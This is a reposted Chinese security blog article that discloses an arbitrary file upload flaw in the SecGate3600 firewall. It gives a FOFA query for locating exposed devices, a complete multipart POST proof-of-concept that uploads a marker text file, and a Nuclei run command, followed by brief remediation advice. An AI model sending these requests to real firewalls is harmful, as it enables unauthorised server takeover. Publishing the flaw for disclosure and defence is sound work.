点击上方蓝字关注我们
BEGINNING OF SPRING
0x01
阅读须知
Reading Instructions
数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。
0x02
漏洞概述
Vulnerability Overview
网神信息技术(北京)股份有限公司是集技术研发、生产制造、综合服务于一体的高科技信息安全方案、产品及服务提供商。
SecGate3600防火墙的obj_app_upfile接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
(文章仅限技术交流,禁止非授权操作!)
0x03
漏洞复现
Vulnerability Recurrence
fofa:fid="1Lh1LHi6yfkhiO83I59AYg=="
1.执行如下语句上传txt文档,并访问该txt文件。
POST /?g=obj_app_upfile HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
Connection: close
Content-Length: 549
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="{{文件名}}.txt"
Content-Type: text/plain
2317852
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
其中Hostname为目标漏洞平台的实际地址或域名,上传路径为/attachements/{{文件名}}.txt
2.访问/attachements/hellowangshen.txt文件,得到内容“2317852”
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="{{文件名}}.txt"
Content-Type: text/plain
2317852
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
(文章仅限技术交流,禁止非授权操作!)
0x04
漏洞脚本
Vulnerability script
1.Nuclei验证脚本命令使用如下:
nuclei.exe -t wangshen-secgate-objappupfile-fileupload.yaml -l wangshen-secgate-objappupfile-fileupload_Subs.txt
--------------------------------------------
wangshen-secgate-objappupfile-fileupload_Subs.txt可以结合实际情况自定义
--------------------------------------------
2.Nuclei的运行截图如下:
3.关注公众号并回复:网神,即可获取脚本。
0x05
修复建议
Repair Suggestions
1.实施产品的权限访问控制,降低互联网搜索引擎的查询。
2.加强后台认证要求(如AAAA策略等),提高口令的安全性。
3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。
往期推荐 · 值得阅看
漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞
2023-09-20
2023年HVV之POC&知识库总结
2023-08-29
漏洞复现|某VPN存在未授权管理用户遍历+任意账号密码修改漏洞
2023-08-15
END
原文始发于微信公众号(数字人才创研院):漏洞复现|网神SecGate3600防火墙存在任意文件上传漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论